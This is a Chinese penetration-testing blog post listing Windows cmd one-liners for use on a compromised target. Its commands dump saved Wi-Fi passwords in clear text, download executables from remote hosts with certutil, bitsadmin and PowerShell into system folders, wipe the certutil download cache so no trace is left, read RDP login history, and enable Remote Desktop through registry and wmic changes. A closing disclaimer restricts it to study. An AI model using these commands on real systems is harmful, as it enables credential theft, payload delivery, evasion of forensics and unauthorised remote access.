cmd渗透命令集合

administrator

发表文章数:115

首页 » Web安全 » cmd渗透命令集合

cmd下获取历史wife密码

for /f “skip=9 tokens=1,2 delims=:” %i in (‘netsh wlan show profiles’) do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

cmd下载文件

certutil -urlcache -split -f http://xxxxxxxxx/1.exe c:/windows/help/1.exe
bitsadmin /transfer n http://xxx/1.exe c:\windows\help\1.exe
powershell (new-object System.Net.WebClient).DownloadFile(‘http://1.1.1.1/1.exe’, ‘c:\Intel\1.exe’)
certutil.exe -urlcache -split -f http://127.0.0.1/1.txt c:\users\test\desktop\temp.txt

但是在下载完成之后会在%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content 缓存目录中保存下载的文件副本。
可以通过certutil.exe -urlcache * 查看到,所以如不清除,便会在目标机器上留下下载地址。
清除下载缓存命令

certutil.exe -urlcache -f http://127.0.0.1/1.exe delete

cmd查看3389连接历史

powershell “& {Get-EventLog -LogName security -Newest 100 | where {$_.EventID -eq 4624} | format-list -property * | findstr “Address”}”

cmd下开启3389

win7
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

win2003

wmic path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1

win2008

wmic /namespace:\\root\cimv2\terminalservices path ```
win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

免责声明:本站所提供工具、技术文章,仅供技术学习交流、请勿用于非法行为,请遵守相关法律规定,否则后果自负。作者:administrator, 转载或复制请以 超链接形式 并注明出处 大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区
原文地址:《cmd渗透命令集合》 发布于2018-08-24

分享到:
赞(0) 打赏 生成海报

评论 抢沙发

评论前必须登录!

  注册



长按图片转发给朋友

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

关于渗透测试入门到进阶教学
后期的系列课程、问答以及工具、思路分享将会在星球发布
切换注册

登录

忘记密码 ?

切换登录

注册